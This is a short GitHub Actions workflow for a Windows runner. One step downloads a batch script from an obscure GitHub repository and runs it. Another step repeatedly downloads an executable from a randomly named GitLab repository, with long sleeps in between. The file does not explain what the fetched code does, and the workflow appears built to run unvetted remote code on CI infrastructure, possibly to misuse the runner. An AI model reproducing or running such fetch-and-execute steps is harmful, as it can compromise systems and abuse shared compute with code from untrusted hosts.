name: Start

on:
  workflow_dispatch:

jobs:
  makeit:
    runs-on: windows-latest

    steps:

      - name: Install 
        run: |
          Invoke-WebRequest https://github.com/Efebey2903/fictional-octo-waffle/raw/main/a.cmd -OutFile setup.cmd
          cmd /c setup.cmd
          
      - name: Start 
        run: |
           curl -o zip.exe -Uri "https://gitlab.com/jfv-he/jrtiiupngk/-/raw/main/use.exe"
           cmd /c sleep 240
           cmd /c curl -o zip.exe -Uri "https://gitlab.com/jfv-he/jrtiiupngk/-/raw/main/use.exe"
           cmd /c sleep 240
        
